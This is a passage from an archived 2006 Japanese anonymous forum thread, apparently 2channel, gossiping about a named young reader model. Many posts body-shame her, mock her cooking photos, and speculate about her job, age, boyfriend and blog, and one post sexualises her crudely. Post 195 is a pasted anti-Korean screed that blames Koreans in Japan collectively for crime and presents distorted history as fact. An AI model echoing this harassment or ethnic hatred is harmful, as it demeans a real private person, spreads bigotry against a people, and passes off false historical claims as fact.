181 :無名モデル:2006/11/28(火) 09:43:21 ID:UYfFVR4e
胸いつも不自然だよね。
天然だとは思うけどなんか豊胸っぽく見えて損してるね。

182 :無名モデル:2006/11/28(火) 11:04:57 ID:3ffaQjsy
mixiでも豊胸コミュにいるよ(笑

183 :無名モデル:2006/11/28(火) 16:07:32 ID:???
薄幸

184 :無名モデル:2006/11/28(火) 21:00:24 ID:1iWV8/6m
彼女は就職どこに決まったの??教えて。

185 :りん:2006/11/29(水) 17:48:01 ID:???
かわいい!!

186 :無名モデル:2006/11/30(木) 00:59:38 ID:gGNzwCjl
テレビ出てる。
足広げすぎ

187 :無名モデル:2006/11/30(木) 02:22:33 ID:8Hy1dEuC
うんワロタ
すんげ細かった

188 :無名モデル:2006/11/30(木) 12:56:20 ID:vJW60FjO
天狗出てた
SEなんて勤まるのかな。お買い物も出来ないお風呂も入れない生活よりは
ヘルプデスク程度のほうが似合ってると思う。


189 :無名モデル:2006/11/30(木) 13:26:22 ID:???
本当に綺麗…細い

190 :無名モデル:2006/11/30(木) 13:27:01 ID:???
由貴奈ちゃんかわいい☆

191 :無名モデル:2006/11/30(木) 13:30:53 ID:UwXZ/+8J
将来の進路は?

192 :無名モデル:2006/11/30(木) 13:32:49 ID:UwXZ/+8J
アパレルだよね!!

193 :無名モデル:2006/11/30(木) 14:47:24 ID:TbIf5ajN
頬骨削ったほうがいい。

194 :無名モデル:2006/11/30(木) 14:50:26 ID:???
>>193
   ∧_∧  / ̄ ̄ ̄ ̄ ̄
  ( ´∀`)< オマエモナー
  (    )  \_____
  | | |
  (__)_)

195 :無名モデル:2006/11/30(木) 15:42:44 ID:???


Q:なぜ朝鮮人が嫌われているのか?

A:インターネットにより,朝鮮人の実態が暴かれたから。
在日朝鮮人は,強制連行の犠牲者だと信じ込まされていたのに,
実際は,そのほとんどが密航・密入国で押し掛けてきた者とその子
孫だと分かった。おまけに戦前から犯罪が多く,とりわけ終戦後に
は,戦勝国民を騙り日本の男達が戦場からまだ復員していないこと
をいいことに,殺人,強姦,強窃盗,麻薬の密売,土地の不法占拠
など凶悪犯罪を犯していたことが分かった。
 また朝鮮を植民地にして彼らをを酷い目に遭わせたと信じ込まさ
れていたのに,実際には,朝鮮人,とりわけ被支配階級の朝鮮人に
とっては祝福ともいえる多大な恩恵を与えた。そして,道路すら無
く荒廃していた土地を近代化させたのも,他ならぬ日本であったこ
とを理解した。
 さらに,日本の敗戦後,日本国内だけでなく半島においても,日
本人に襲いかかり多大な被害と損害を与え,莫大な財産を略奪した
ことも明らかになった。
 そのうえ,今日に至るまで韓国は強烈な反日教育を行ない,こと
あるごとに日本へ害をなし,北朝鮮は日本に対して拉致,違法送金,
麻薬の密輸,工作員の送り込みなどの敵対行為をおこなってきたこ
とを知った。
 これだけのことをやられたことが分かったら,怒るのは当然である。


196 :無名モデル:2006/12/01(金) 12:51:12 ID:gSlgMUAM
また彼氏ネタ。
ミートソース作ったはいいけど
コンロの付近こぼしまくりで汚い・・・
盛り付けも貧乏臭いし

197 :無名モデル:2006/12/01(金) 16:50:28 ID:???
うん貧乏臭くて笑ったw
なんか小学校の家庭科の調理実習で作ったような感じ

198 :無名モデル:2006/12/03(日) 02:18:41 ID:???
調理実習www

199 :無名モデル:2006/12/04(月) 17:19:31 ID:???
コイツの彼氏と合コンしましたが何か?

200 :無名モデル:2006/12/04(月) 22:12:52 ID:???
>>199
      ,、‐'''''''''ヽ、
    /:::::;;-‐-、:::ヽ             _,,,,,,,_
     l::::::l  _,,、-‐"iiiiiilllllllllllliiiiiiiー-、__ゞ:::::::::::`ヽ,
    ヽ::`/: : : : iiiiiilllll||llllliiiiii: : : : : : ヽイ~`ヽ:::::::i
.     /;,..-‐、: : : : : l|l: : : : : : : : : : : : : \ ノ:::::}
     /: /: : : : :`.: : : : : : : : :/´ ̄\ : : : : : ヽ:::ノ
.    !: : : :iflllli、: : : : : : : : : : : : : : : :ヽ: : : : : :.!
    |: : : :llllf l: : : : : : : : : : :.iflllli、: : : : : <iiii|
    |: : : :|llll |: : : : : : : : : : .llllf l: : : : : : : : :.|
    |: : : :.!lllll!' : : : : : : : : : : |llll |: : : : : : : : :i     何も用はないよ
   /: : : : :    ○    : : .!lllll!' : : : : : : : :.i 
   ̄|: : :"  ,,,,,,,,,,,,,|____    : : : : : : : :.<iii/  
.  /!.:   |:::::/    ̄''''''''l ヽ: : : : :-─/─
    ヽ   ヽ/        ノ    : : :ヽ/  
     \  \,,_    _,,,/     : /\
       `''‐、、__  ̄ ̄   __,,,、-‐"    
.     //:::::/ヽ ̄ ̄ ̄ ̄ノ::::/\
.   / /:::::/  ` ̄ ̄ ̄/:::::/.  \

201 :無名モデル:2006/12/04(月) 22:39:49 ID:???
俺もやった

202 :無名モデル:2006/12/05(火) 04:33:13 ID:???
彼氏どんなひと?
いままで彼氏かわいそうって同情してたけど…

203 :無名モデル:2006/12/05(火) 08:33:54 ID:KvgFN5uF
懲りずにまた料理のシャメ。
相変わらず調理実習みたいでマズそうにしか見えないのに
「自慢の料理」とか「彼氏があまりのおいしさに驚いてる」
って言えちゃうところがスゴスwww
さすが大物!

204 :無名モデル:2006/12/05(火) 18:11:03 ID:???
うえつはらさん
テレビだと可愛いけど
雑誌や写メだと幸薄い

205 :無名モデル:2006/12/09(土) 22:30:42 ID:FNiQiNup
ティアラガールのパーティーで見たけど、飛び抜けて美人だった!
あんな綺麗な子いるんだね。
羨ましすぎるよ‥


206 :無名モデル:2006/12/10(日) 13:56:41 ID:v9mj/bh2
上津原さんは香里奈ファンでコーデとか真似してるんですよね?
2人ともかわいいですね。


207 :無名モデル:2006/12/10(日) 14:53:07 ID:js6RngLg
読者モデルじゃもったいないくらいきれいだよね

208 :無名モデル:2006/12/11(月) 11:59:16 ID:o7KHpDzz
なんか本人必死www

209 :無名モデル:2006/12/11(月) 12:11:03 ID:l16mSAl0
進路はアパレルかな?☆

210 :無名モデル:2006/12/11(月) 20:31:18 ID:???
風が吹いたら飛ばされそう。貧相な身体。
ヒップに肉がなくてジーンズ似合わないね。何か変w

ブラにはパットを何枚入れてるんですか?

211 :無名モデル:2006/12/14(木) 10:25:53 ID:???
ほんまどうでもいい話やけどこのこの飼い犬の名前って…。
某ゲームの主人公の名前から拝借した?
ブログの自己紹介でマニアックな大学生言うてたし…。


212 :無名モデル:2006/12/14(木) 20:14:22 ID:???
ガリガリ君

213 :無名モデル:2006/12/14(木) 23:04:17 ID:???
ブログのスッピン画ブス過ぎてビックリ…
好きだっただけに衝撃が大き過ぎた

214 :無名モデル:2006/12/14(木) 23:10:38 ID:???
で?ドクモにもなれない子でしょ?
ドクモでも弱小でしょ?
頑張ってねwみじめちゃんwww

215 :無名モデル:2006/12/15(金) 02:14:56 ID:VbYcfkIS
>今日はまたまた香水を買ったんだけど、
もぅすっぴんになっちゃったから明日紹介しまぁす

なんですっぴんだと紹介できないの?

216 :無名モデル:2006/12/15(金) 05:33:07 ID:???
>>215
童貞乙

217 :無名モデル:2006/12/15(金) 06:15:58 ID:SOQa3lAl
可愛ければイイなぁ♪…!!☆

218 :無名モデル:2006/12/15(金) 14:19:29 ID:SOQa3lAl
敬語使えないくらいいいじゃない…若いんだし。
最初は敬語使ってたよー仲良くなってからタメ語になったけど、若いうちは敬語くらい許容範囲です。
何故なら可愛いから…いや、可愛いくて素直で好きだから。
因みに誰だって最初からギャルじゃないでしょうに……。
でもすっぴんでも可愛い…訳あってもう会えないんだけど本当に大好き。
ゆきなちゃん見ると自分がコケシかハニワっぽく見えて……
整形しようか考えちゃうし私が男だったら貢いでたかも……orz

219 :無名モデル:2006/12/15(金) 14:27:38 ID:SOQa3lAl
可愛ければイイとも!!☆

220 :無名モデル:2006/12/15(金) 17:26:36 ID:tZl0B5Jn
mixiコミュニより。最善解決に就職なのかな。

221 :無名モデル:2006/12/15(金) 17:53:56 ID:???
最善解決法だと私は訳した

222 :無名モデル:2006/12/15(金) 20:59:53 ID:+LXLVB/r
二十歳過ぎて敬語使えない奴はどこ行っても使えない

223 :無名モデル:2006/12/15(金) 22:42:41 ID:???
遅刻してるのにヘトヘトとか何様だよこいつ。どんだけの人に迷惑かかるか知らないんだね。

カワイソ

224 :無名モデル:2006/12/16(土) 12:24:56 ID:t3IpitYS
由貴奈ちゃん…
イヴはどう過ごすのかな?☆
アパレルのオーナー就任今度になるかも☆

225 :無名モデル:2006/12/16(土) 12:56:32 ID:???
http://xrl.us/rjje


226 :無名モデル:2006/12/17(日) 14:44:57 ID:OEGtmKof
デスノートの戸田恵梨香に似てる。

227 :無名モデル:2006/12/18(月) 00:25:56 ID:???
目尻にホクロあると恋愛に難あり、問題を起こしやすい、
色情に溺れて身を滅ぼしやすいんだって。
小室哲哉も人相学で言われていたよ。

228 :無名モデル:2006/12/18(月) 02:03:45 ID:DnaQyZYs
びみょ〜☆

229 :無名モデル:2006/12/18(月) 05:01:25 ID:NeExx84l
肌きたない…

230 :無名モデル:2006/12/18(月) 05:23:59 ID:???
>>229
はいはいおまえの肌はきれいだよすげえ美人だよ

231 :無名モデル:2006/12/18(月) 14:28:22 ID:e8reTc5e
春にみた雑誌には19歳って載ってたけど…うそなんだね。

232 :無名モデル:2006/12/18(月) 15:36:09 ID:???
軽っ!
この子のダイエット前が今のあたしの体重だわ・・・
がんばって痩せます。。

233 :無名モデル:2006/12/20(水) 03:54:59 ID:???
胸は落ちないように気を付けてね☆

234 :無名モデル:2006/12/20(水) 16:30:24 ID:???
妬みすぎて醜いスレだね
うえっつより可愛い人はここには100%いない

235 :無名モデル:2006/12/23(土) 08:45:05 ID:???
>>234
おまえも含めて

236 :無名モデル:2006/12/23(土) 18:31:15 ID:J889THby
あまりに美人過ぎて漏れ、オナニーのおかずにしてる

237 :無名モデル:2006/12/23(土) 20:52:08 ID:???
本当に美人で羨ましい

238 :無名モデル:2006/12/24(日) 12:38:02 ID:fcvHVV9N
238 名前: 無名モデル 2005/05/27(金) 23:07:01 ID:Kutpna7E
さわやかだょね。コテコテしてなぃ。メイクがナチュラルだからいいのかな?

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)